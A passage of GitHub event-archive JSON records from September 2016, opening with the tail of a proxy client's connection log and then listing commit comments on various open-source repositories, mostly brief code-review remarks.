\r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 11.11.11.11:443 for 11.11.11.11 with error:dial tcp 11.11.11.11:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 10.10.10.10:443 for 10.10.10.10 with error:dial tcp 10.10.10.10:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 11.11.11.11:443 for 11.11.11.11 with error:dial tcp 11.11.11.11:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 10.10.10.10:443 for 10.10.10.10 with error:dial tcp 10.10.10.10:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:12 direct.go:174: Failed to connect 11.11.11.11:443 for 11.11.11.11 with error:dial tcp 11.11.11.11:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:13 direct.go:174: Failed to connect google.com:80 for google.com with error:dial tcp 216.58.203.46:80: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:21 channel.go:330: Failed to read channel for reason:read tcp 192.168.1.102:53562->vps ip:8668: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:21 channel.go:330: Failed to read channel for reason:read tcp 192.168.1.102:53564->vps ip:8668: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:21 channel.go:330: Failed to read channel for reason:read tcp 192.168.1.102:53560->vps ip:8668: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:21 channel.go:270: Channel[0] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:21 channel.go:270: Channel[1] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:22 channel.go:270: Channel[2] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n"}},"created_at":"2016-09-28T12:39:06Z"}
{"id":"4630379342","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"mofl-aspit/PersonPolymorph.Exercise"},"payload":{"comment":{"id":19206574,"position":null,"line":null,"path":null,"commit_id":"e6e3ba1fbd584759fe7b075c9a61707c2886ac65","created_at":"2016-09-28T12:39:11Z","updated_at":"2016-09-28T12:39:11Z","body":"Udmærket. Men pas på du ikke fortaber dig i beregninger af løn osv. Prøv at holde fokus på arkitektur/struktur."}},"created_at":"2016-09-28T12:39:11Z"}
{"id":"4630380066","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206575,"position":23,"line":34,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-28T12:39:21Z","updated_at":"2016-09-28T12:39:21Z","body":"Typo: cahracter > character\r\n\r\n(Not blocking)"}},"created_at":"2016-09-28T12:39:21Z"}
{"id":"4630382919","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/bahmni-core"},"payload":{"comment":{"id":19206581,"position":5,"line":250,"path":"bahmnicore-api/src/main/java/org/bahmni/module/bahmnicore/service/impl/BahmniBridge.java","commit_id":"7cd4e7d95e5d3515a76e59b6a3bfa18dad27fde3","created_at":"2016-09-28T12:39:55Z","updated_at":"2016-09-28T12:39:55Z","body":"@padmavati We are using this method in a groovy script https://github.com/Bahmni/endtb-config/blob/master/openmrs/flowsheetExtension/BMIExtension.groovy#L67\r\nPlease revert your change."}},"created_at":"2016-09-28T12:39:55Z"}
{"id":"4630389156","type":"CommitCommentEvent","actor":{"login":"KnightMiner"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":19206590,"position":null,"line":null,"path":null,"commit_id":"a470839ceb1b30f8f06bef4ba556eba0cba7ed3c","created_at":"2016-09-28T12:41:08Z","updated_at":"2016-09-28T12:41:08Z","body":"Shovels would have the same issue, right?"}},"created_at":"2016-09-28T12:41:08Z"}
{"id":"4630392090","type":"CommitCommentEvent","actor":{"login":"Yangrororo"},"repo":{"name":"Yangrororo/Haroro"},"payload":{"comment":{"id":19206595,"position":null,"line":null,"path":null,"commit_id":"22d4d274850d050a671f7e1433bb2ff78c770839","created_at":"2016-09-28T12:41:42Z","updated_at":"2016-09-28T12:41:42Z","body":"Yoo Jea Suk"}},"created_at":"2016-09-28T12:41:42Z"}
{"id":"4630392191","type":"CommitCommentEvent","actor":{"login":"somelong"},"repo":{"name":"somelong/jsp"},"payload":{"comment":{"id":19206597,"position":null,"line":null,"path":null,"commit_id":"e8999dcb8f06e6e8f91e6f1e88e08057290443eb","created_at":"2016-09-28T12:41:44Z","updated_at":"2016-09-28T12:41:44Z","body":"老李是智障"}},"created_at":"2016-09-28T12:41:44Z"}
{"id":"4630394766","type":"CommitCommentEvent","actor":{"login":"Ehtibar"},"repo":{"name":"EtibarKerimov/Texniki-Xidmet"},"payload":{"comment":{"id":19206605,"position":null,"line":null,"path":null,"commit_id":"932cfb742c2d3431fef2365b881acbc00e044920","created_at":"2016-09-28T12:42:14Z","updated_at":"2016-09-28T12:42:14Z","body":"ууу"}},"created_at":"2016-09-28T12:42:14Z"}
{"id":"4630396745","type":"CommitCommentEvent","actor":{"login":"kevgathuku"},"repo":{"name":"andela-tbaraza/docsys-api"},"payload":{"comment":{"id":19206608,"position":37,"line":24,"path":"test/seeder/seed.js","commit_id":"33bf0df8b7d85712b9ad65a0087db67752fc2d88","created_at":"2016-09-28T12:42:38Z","updated_at":"2016-09-28T12:42:38Z","body":"It's a good idea to remove debugging comments from the code after you're done with them"}},"created_at":"2016-09-28T12:42:38Z"}
{"id":"4630397936","type":"CommitCommentEvent","actor":{"login":"kevgathuku"},"repo":{"name":"andela-tbaraza/docsys-api"},"payload":{"comment":{"id":19206610,"position":61,"line":36,"path":"test/seeder/seed.js","commit_id":"33bf0df8b7d85712b9ad65a0087db67752fc2d88","created_at":"2016-09-28T12:42:52Z","updated_at":"2016-09-28T12:42:52Z","body":"See above comment about comments"}},"created_at":"2016-09-28T12:42:52Z"}
{"id":"4630398676","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19206611,"position":null,"line":null,"path":null,"commit_id":"a8bdc2e654f4fa0577d4bc46c37479ac0196f831","created_at":"2016-09-28T12:43:00Z","updated_at":"2016-09-28T12:43:00Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/a8bdc2e654f4fa0577d4bc46c37479ac0196f831#commitcomment-19205090) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/2f0c5471c6af4ccbe0081433df627942c48a6f1d/a8bdc2e_vs_3d8b39b/report.md). cc @jrevels"}},"created_at":"2016-09-28T12:43:00Z"}
{"id":"4630398769","type":"CommitCommentEvent","actor":{"login":"dwmw2"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19206612,"position":14,"line":280,"path":"src/libp11-int.h","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-28T12:43:01Z","updated_at":"2016-09-28T12:43:01Z","body":"We should probably hook this up to the `\"SET_USER_INTERFACE\"` engine command. which at least the openssl command-line tool will use (see apps/apps.c::setup_engine()). The `ui_method` passed into the engine's load_key method, if set, can then override it.\r\n\r\nThat means we can request a PIN for the load_cert operation too, which AFAICT currently doesn't work (so we can't use certs with `CKA_PRIVATE`)."}},"created_at":"2016-09-28T12:43:01Z"}
{"id":"4630399615","type":"CommitCommentEvent","actor":{"login":"Ehtibar"},"repo":{"name":"EtibarKerimov/Texniki-Xidmet"},"payload":{"comment":{"id":19206617,"position":null,"line":null,"path":null,"commit_id":"932cfb742c2d3431fef2365b881acbc00e044920","created_at":"2016-09-28T12:43:10Z","updated_at":"2016-09-28T12:43:10Z","body":"COMMIT"}},"created_at":"2016-09-28T12:43:10Z"}
{"id":"4630403543","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/PersonPolymorfi"},"payload":{"comment":{"id":19206622,"position":76,"line":139,"path":"PersonHierarchy/Admini/Course.cs","commit_id":"0d4c45e9c8c5425f17fd58cb611b84d16a8f3fa0","created_at":"2016-09-28T12:43:53Z","updated_at":"2016-09-28T12:43:53Z","body":"iovervej om det virkelig er ekseptionelt. at en person allerede eksisterer. Og om exception håndtering er smart her - måske kunne der raises en event i stedet, for at gøre brugeren opmærksom på dette? (exceptionhåndtering er meget performance-tungt.)"}},"created_at":"2016-09-28T12:43:53Z"}
{"id":"4630414893","type":"CommitCommentEvent","actor":{"login":"alexfrieden"},"repo":{"name":"ccgd-profile/BreaKmer"},"payload":{"comment":{"id":19206642,"position":null,"line":null,"path":null,"commit_id":"3a3831563048b3aa16c04e86c8b6abe213136106","created_at":"2016-09-28T12:46:05Z","updated_at":"2016-09-28T12:46:05Z","body":"HI @DNA-language, we will look into what version you should be using.  Stay tuned.  "}},"created_at":"2016-09-28T12:46:05Z"}
{"id":"4630415523","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206646,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-28T12:46:12Z","updated_at":"2016-09-28T12:46:12Z","body":"Rather than n_chars, why not use char_count? n_chars is a bit ambiguous (could also mean \"the number of 'n' characters)."}},"created_at":"2016-09-28T12:46:12Z"}
{"id":"4630418646","type":"CommitCommentEvent","actor":{"login":"JoelCapitao"},"repo":{"name":"thelabnyc/wagtail_blog"},"payload":{"comment":{"id":19206651,"position":null,"line":null,"path":null,"commit_id":"d0730def1499d975df4040159bc0f1ac4b8ef1dc","created_at":"2016-09-28T12:46:48Z","updated_at":"2016-09-28T12:46:48Z","body":"Thank you  for this commit 👍 \r\nI downloaded wagtail_blog from PyPI which is not up-to-date"}},"created_at":"2016-09-28T12:46:48Z"}
{"id":"4630419983","type":"CommitCommentEvent","actor":{"login":"karunalingham"},"repo":{"name":"karunalingham/slate"},"payload":{"comment":{"id":19206656,"position":null,"line":null,"path":null,"commit_id":"1e54d1dd419d442122c73891f5bf39612239e190","created_at":"2016-09-28T12:47:05Z","updated_at":"2016-09-28T12:47:05Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Unit tests](https://trello.com/c/J2qBvsty/6-unit-tests)"}},"created_at":"2016-09-28T12:47:05Z"}
{"id":"4630421637","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206661,"position":110,"line":270,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T12:47:24Z","updated_at":"2016-09-28T12:47:24Z","body":"Why is it taking the points left and right of the closest vertex? What is that for? Perhaps document this?"}},"created_at":"2016-09-28T12:47:24Z"}
{"id":"4630427199","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19206671,"position":25,"line":85,"path":"CONTRIBUTING.md","commit_id":"1c0bd45eee52e53f81b49641e991f26aac76bb3b","created_at":"2016-09-28T12:48:28Z","updated_at":"2016-09-28T12:48:28Z","body":"EDT for typing stuff\r\n\r\nwhat about completion & intentions?"}},"created_at":"2016-09-28T12:48:28Z"}
{"id":"4630427585","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19206673,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T12:48:33Z","updated_at":"2016-09-28T12:48:33Z","body":">\n>\n>    - Theme designer needs to consider the fact headerbar.titlebar\n>    style-class is shared with CSDs and SSDs applications (for example,\n>    gnome-terminal and nautilus will share that class).\n>\n> Yes, but titlebar should be same between csd and ssd windows, no?\n\n>\n>    - .ssd and .default-decoration style-class are completely ignored in\n>    Metacity (but Mutter still needs them). So we need to add newer theming\n>    section only for Metacity.\n>\n> .default-decoration should not be ignored in metacity, is it? For example\nAdwaita use .ssd only to remove shadow... Any reason why you use it for\nother things? Do you want that decorations looks different between csd and\nssd windows? Or simply something does not work and you are trying to\nworkaround problems?\n\n>\n>    - Metacity does not have any specific style-class and/or node to\n>    theming.\n>\n> I was thinking about this, but I also think that decorations should look\nsame between both type windows.\n\n>\n>    - When theming, our beloved CSS inspector does not help at all because\n>    window-frame elements are not listed in anywhere ( neither GtkWindow\n>    node nor decoration node). This fact happens in Mutter as well, but\n>    Muter is under perfect control via .ssd .titlebar and decoration\n>    .titlebar class.\n>\n> CSS nodes and classes in Metacity:\nwindow.background.csd\n+ decoration\n+ headerbar.titlebar.horizontal.default-decoration\n++ label.title\n++ button.titlebutton\n+++ image\n\n- .csd might be replaced with .solid-csd when compositing manager is not\navailable.\n- window node can also have .tiled, .maximized and .fullscreen classes.\n- button node can also have .close, .maximize and .minimize classes.\n\nMutter have same elements with small exception - it use .ssd .class not\n.csd or .solid-csd.\n\n>\n>    - Window-manager ignores margins outside of button.titlebutton\n>    style-class, it means Metacity will ignore the headerbar geometry if theme\n>    designers employed margin property to define the height of headerbar node.\n>    On the other hand, Mutter is OK because we can set specific spacing factors\n>    into .ssd .titlebar style-class with padding property.\n>\n> Sounds like Mutter and Metacity should support margins on buttons...\n"}},"created_at":"2016-09-28T12:48:33Z"}
{"id":"4630429644","type":"CommitCommentEvent","actor":{"login":"Merkrow"},"repo":{"name":"Merkrow/tasks"},"payload":{"comment":{"id":19206675,"position":null,"line":null,"path":null,"commit_id":"811aad9af222ccf08fb874ef583688fb48144207","created_at":"2016-09-28T12:48:58Z","updated_at":"2016-09-28T12:48:58Z","body":"counting letters in sentence"}},"created_at":"2016-09-28T12:48:58Z"}
{"id":"4630433206","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19206681,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-28T12:49:39Z","updated_at":"2016-09-28T12:49:39Z","body":"Viel Glück!"}},"created_at":"2016-09-28T12:49:39Z"}
{"id":"4630434409","type":"CommitCommentEvent","actor":{"login":"LeandroRoberto"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":19206684,"position":null,"line":null,"path":null,"commit_id":"8181e0c3e1544a3fd1b273b0c91ba7a8ab2e9470","created_at":"2016-09-28T12:49:53Z","updated_at":"2016-09-28T12:49:53Z","body":"o subnav pode ser retirado de funcionalidades que estão dentro da mesma app... feito aqui.\r\nCaso a Proposições necessite de um menu particular, basta criar um arquivo, por exemplo subnav_proposicao.yaml, e colocar o caminho no contexto."}},"created_at":"2016-09-28T12:49:53Z"}
{"id":"4630435098","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206685,"position":125,"line":285,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T12:50:02Z","updated_at":"2016-09-28T12:50:02Z","body":"You could just put this check in the `for` line."}},"created_at":"2016-09-28T12:50:02Z"}
{"id":"4630435589","type":"CommitCommentEvent","actor":{"login":"alonsogarciapablo"},"repo":{"name":"CartoDB/cartodb.js"},"payload":{"comment":{"id":19206687,"position":null,"line":null,"path":null,"commit_id":"d58feb6fec9c382e52c1f1ea908725858de35969","created_at":"2016-09-28T12:50:08Z","updated_at":"2016-09-28T12:50:08Z","body":"Final twist... you could \"positivize\" the conditional:\r\n\r\n```\r\nif (_.isObject(val)) {\r\n  return val;\r\n}\r\nreturn String(val);\r\n```"}},"created_at":"2016-09-28T12:50:08Z"}
{"id":"4630441052","type":"CommitCommentEvent","actor":{"login":"fgriguol"},"repo":{"name":"SDCteam/SDC-Collaboration-Hub"},"payload":{"comment":{"id":19206695,"position":null,"line":null,"path":null,"commit_id":"240e3279f296a5eea976806e0e314dbff3c4fb2f","created_at":"2016-09-28T12:51:10Z","updated_at":"2016-09-28T12:51:10Z","body":"The purpose of this repository is to test functionalities"}},"created_at":"2016-09-28T12:51:10Z"}
{"id":"4630441420","type":"CommitCommentEvent","actor":{"login":"scoumbourdis"},"repo":{"name":"scoumbourdis/grocery-crud"},"payload":{"comment":{"id":19206696,"position":null,"line":null,"path":null,"commit_id":"f07074917df2a449e200bcc622db28944e0d8725","created_at":"2016-09-28T12:51:13Z","updated_at":"2016-09-28T12:51:13Z","body":"Hello @portapipe I did find another mistake.\r\n\r\nYou need to specify the table for the id. From the tests that I had I did get the below error:\r\n\r\nColumn 'id' in field list is ambiguous."}},"created_at":"2016-09-28T12:51:13Z"}
{"id":"4630442624","type":"CommitCommentEvent","actor":{"login":"matallo"},"repo":{"name":"CartoDB/cartodb.js"},"payload":{"comment":{"id":19206697,"position":null,"line":null,"path":null,"commit_id":"d58feb6fec9c382e52c1f1ea908725858de35969","created_at":"2016-09-28T12:51:26Z","updated_at":"2016-09-28T12:51:26Z","body":"haha, indeed 🙇 "}},"created_at":"2016-09-28T12:51:26Z"}
{"id":"4630447369","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206704,"position":117,"line":277,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T12:52:22Z","updated_at":"2016-09-28T12:52:22Z","body":"`segment_start.point_idx + 1` is again the `closest_vert`, right?"}},"created_at":"2016-09-28T12:52:22Z"}
{"id":"4630451766","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19206714,"position":29,"line":29,"path":"Assets/XControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T12:53:12Z","updated_at":"2016-09-28T12:53:12Z","body":"lastVal = lastVal + 1 % size;"}},"created_at":"2016-09-28T12:53:12Z"}
{"id":"4630454491","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19206721,"position":null,"line":null,"path":null,"commit_id":"0698c1b08d43478e9462907ce72f90419b7f1acd","created_at":"2016-09-28T12:53:41Z","updated_at":"2016-09-28T12:53:41Z","body":"Suggest some"}},"created_at":"2016-09-28T12:53:41Z"}
{"id":"4630456218","type":"CommitCommentEvent","actor":{"login":"itaimal"},"repo":{"name":"Rocket-Team/Freeven"},"payload":{"comment":{"id":19206725,"position":null,"line":null,"path":null,"commit_id":"6e1e8d041ac0c4eb97f5fb579d0ead5b6876cc5a","created_at":"2016-09-28T12:54:00Z","updated_at":"2016-09-28T12:54:00Z","body":"Diego,  mira que el ultimo build quedó con error,  para que le des una revisada.\r\n\r\n         File \"/app/.heroku/python/lib/python3.5/os.py\", line 725, in __getitem__\r\n           raise KeyError(key) from None\r\n       KeyError: 'DATABASE_NAME'\r\n !     Error while running '$ python manage.py collectstatic --noinput'.\r\n       See traceback above for details.\r\n\r\n![deploy error](https://cloud.githubusercontent.com/assets/7873993/18913960/90c52706-8550-11e6-997b-5aff4179c829.PNG)\r\n\r\n"}},"created_at":"2016-09-28T12:54:00Z"}
{"id":"4630456869","type":"CommitCommentEvent","actor":{"login":"portapipe"},"repo":{"name":"scoumbourdis/grocery-crud"},"payload":{"comment":{"id":19206727,"position":null,"line":null,"path":null,"commit_id":"f07074917df2a449e200bcc622db28944e0d8725","created_at":"2016-09-28T12:54:08Z","updated_at":"2016-09-28T12:54:08Z","body":"You are right :)"}},"created_at":"2016-09-28T12:54:08Z"}
{"id":"4630457986","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19206730,"position":29,"line":29,"path":"Assets/XControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T12:54:21Z","updated_at":"2016-09-28T12:54:21Z","body":"lastVal = (lastVal + 1) % size;\r\nСкобки забыл"}},"created_at":"2016-09-28T12:54:21Z"}
{"id":"4630458358","type":"CommitCommentEvent","actor":{"login":"emmanouil"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19206732,"position":null,"line":null,"path":null,"commit_id":"705e199c8eadf35774520206d7f7cf1a043c0539","created_at":"2016-09-28T12:54:24Z","updated_at":"2016-09-28T12:54:24Z","body":"There seems to be a build issue on android, potentially coming from this, or this 3ac92d371e2e6c3c3d6c9edf44c7d44b733d8407 commit\r\ncc: @rbouqueau "}},"created_at":"2016-09-28T12:54:24Z"}
{"id":"4630461557","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19206741,"position":17,"line":101,"path":"tests/src/testgen/gen.R","commit_id":"47fa5260e7c819e087a70f483ff2a4ca96b98c49","created_at":"2016-09-28T12:55:00Z","updated_at":"2016-09-28T12:55:00Z","body":"replace with `set.seed(1)`"}},"created_at":"2016-09-28T12:55:00Z"}
{"id":"4630463512","type":"CommitCommentEvent","actor":{"login":"vitalif"},"repo":{"name":"vitalif/grive2"},"payload":{"comment":{"id":19206745,"position":6,"line":53,"path":"libgrive/src/protocol/AuthAgent.cc","commit_id":"aa350335e35fc1cc73ecdcf1444909d4607c5557","created_at":"2016-09-28T12:55:21Z","updated_at":"2016-09-28T12:55:21Z","body":"Already fixed"}},"created_at":"2016-09-28T12:55:21Z"}
{"id":"4630469887","type":"CommitCommentEvent","actor":{"login":"vitalif"},"repo":{"name":"vitalif/grive2"},"payload":{"comment":{"id":19206764,"position":72,"line":72,"path":"libgrive/src/util/ProgressBar.cc","commit_id":"aa350335e35fc1cc73ecdcf1444909d4607c5557","created_at":"2016-09-28T12:56:30Z","updated_at":"2016-09-28T12:56:30Z","body":"I don't see any profit from using C++ abstractions here :)"}},"created_at":"2016-09-28T12:56:30Z"}
{"id":"4630472334","type":"CommitCommentEvent","actor":{"login":"friism"},"repo":{"name":"docker/communitytools-image2docker-win"},"payload":{"comment":{"id":19206772,"position":4,"line":30,"path":"Artifacts/IIS/Discover.ps1","commit_id":"13a180487d01c32a2ff27ba8ada1e95f457cacdf","created_at":"2016-09-28T12:56:55Z","updated_at":"2016-09-28T12:56:55Z","body":"superflous whitespace"}},"created_at":"2016-09-28T12:56:55Z"}
{"id":"4630472508","type":"CommitCommentEvent","actor":{"login":"Cickle"},"repo":{"name":"Cickle/Text"},"payload":{"comment":{"id":19206773,"position":null,"line":null,"path":null,"commit_id":"15453c799e38c09d40c133e92c9dbc5501992056","created_at":"2016-09-28T12:56:57Z","updated_at":"2016-09-28T12:56:57Z","body":"sdfsdf"}},"created_at":"2016-09-28T12:56:57Z"}
{"id":"4630473131","type":"CommitCommentEvent","actor":{"login":"Cickle"},"repo":{"name":"Cickle/Text"},"payload":{"comment":{"id":19206774,"position":null,"line":null,"path":null,"commit_id":"15453c799e38c09d40c133e92c9dbc5501992056","created_at":"2016-09-28T12:57:04Z","updated_at":"2016-09-28T12:57:04Z","body":"fasdfasdf"}},"created_at":"2016-09-28T12:57:04Z"}
{"id":"4630473674","type":"CommitCommentEvent","actor":{"login":"shin-migami"},"repo":{"name":"Aniq55/Poly-Graph-Plotter"},"payload":{"comment":{"id":19206775,"position":null,"line":null,"path":null,"commit_id":"afb54319182472ddc6884336d02d010b1da60b46","created_at":"2016-09-28T12:57:10Z","updated_at":"2016-09-28T12:57:10Z","body":"Can you please add a bit more information about the project ?? "}},"created_at":"2016-09-28T12:57:10Z"}
{"id":"4630477903","type":"CommitCommentEvent","actor":{"login":"devinbarry"},"repo":{"name":"middagj/pymogile"},"payload":{"comment":{"id":19206786,"position":null,"line":null,"path":null,"commit_id":"75976a2dae600f2d5a85640a4546c80044f169ac","created_at":"2016-09-28T12:57:57Z","updated_at":"2016-09-28T12:57:57Z","body":"👍 "}},"created_at":"2016-09-28T12:57:57Z"}
{"id":"4630484055","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19206797,"position":null,"line":null,"path":null,"commit_id":"3676159054ba0687ac51335ab5c8d89d171590fe","created_at":"2016-09-28T12:59:05Z","updated_at":"2016-09-28T12:59:05Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Ajouter la version de lodex dans l'interface comme dans ezmaster](https://trello.com/c/INl4k5ez/28-ajouter-la-version-de-lodex-dans-l-interface-comme-dans-ezmaster)"}},"created_at":"2016-09-28T12:59:05Z"}
{"id":"4630484651","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206798,"position":143,"line":303,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T12:59:09Z","updated_at":"2016-09-28T12:59:09Z","body":"Wait, wipe points are not on the edge of the prime tower?!"}},"created_at":"2016-09-28T12:59:09Z"}
{"id":"4630488791","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19206810,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T12:59:56Z","updated_at":"2016-09-28T12:59:56Z","body":"Scoped vars and adhoc? Not sure what this is trying to do"}},"created_at":"2016-09-28T12:59:56Z"}
{"id":"4630489069","type":"CommitCommentEvent","actor":{"login":"linanqiu"},"repo":{"name":"linanqiu/word2vec-sentiments"},"payload":{"comment":{"id":19206811,"position":null,"line":null,"path":null,"commit_id":"44d024047705ca80eae2cbffb9175cee7e60fbbb","created_at":"2016-09-28T13:00:00Z","updated_at":"2016-09-28T13:00:00Z","body":"Have you tried `model.docvecs['TRAIN_NEG_0']` ? I wrote in the doc \r\n\r\n> some people report errors with this step. If you're getting a key error for TRAIN_NEG_0, try `model.docvecs['TRAIN_NEG_0']`"}},"created_at":"2016-09-28T13:00:00Z"}
{"id":"4630489469","type":"CommitCommentEvent","actor":{"login":"Blackbaud-DebraFreund"},"repo":{"name":"Blackbaud-DebraFreund/hello-world"},"payload":{"comment":{"id":19206813,"position":1,"line":1,"path":"README.md","commit_id":"95e39f1935ebe3ac1339e341c5bbc00f6ed0db62","created_at":"2016-09-28T13:00:04Z","updated_at":"2016-09-28T13:00:04Z","body":"Here is my new comment"}},"created_at":"2016-09-28T13:00:04Z"}
{"id":"4630492168","type":"CommitCommentEvent","actor":{"login":"nobelperfect"},"repo":{"name":"nobelperfect/MyProjects"},"payload":{"comment":{"id":19206818,"position":84,"line":84,"path":"reactTutorial.html","commit_id":"ed65a45572780f01ea94d6e1dabcd08c828aa11c","created_at":"2016-09-28T13:00:32Z","updated_at":"2016-09-28T13:00:32Z","body":"delete the space"}},"created_at":"2016-09-28T13:00:32Z"}
{"id":"4630493391","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19206821,"position":37,"line":77,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T13:00:44Z","updated_at":"2016-09-28T13:00:44Z","body":"not sure I understand this either"}},"created_at":"2016-09-28T13:00:44Z"}
{"id":"4630495334","type":"CommitCommentEvent","actor":{"login":"Coduz"},"repo":{"name":"eurotech/kapua"},"payload":{"comment":{"id":19206831,"position":null,"line":null,"path":null,"commit_id":"5337f52bfd5a3cbc686d8b90482a2c914715b224","created_at":"2016-09-28T13:01:07Z","updated_at":"2016-09-28T13:01:07Z","body":"Hi @hekonsek ,\r\n\r\nI understood you point, but I would like to keep it as before. Otherwise bigger objects with a lot of required parameters will have a constructor with lots of parameters, resulting in messy invocation. \r\n\r\nI also think that API changes should be discussed in a issue before make changes. This is important because we need to keep all developers aligned. If each of us starts to implement things on its own preferences we will have each service/feature/pieceOfCode written in a different manner. \r\n\r\nPlease comment your opinions on my points,\r\n\r\nRegards, \r\n\r\n_Alberto_"}},"created_at":"2016-09-28T13:01:07Z"}
{"id":"4630495868","type":"CommitCommentEvent","actor":{"login":"messoremTsX"},"repo":{"name":"ts-x/TSX-WEB"},"payload":{"comment":{"id":19206833,"position":null,"line":null,"path":null,"commit_id":"3df58b8d8ee34da7ccf5ee80711190486d0f34e2","created_at":"2016-09-28T13:01:13Z","updated_at":"2016-09-28T13:01:13Z","body":"Si vous ne l'avez pas,  cela....  La répétition c'est \"la clef\" "}},"created_at":"2016-09-28T13:01:13Z"}
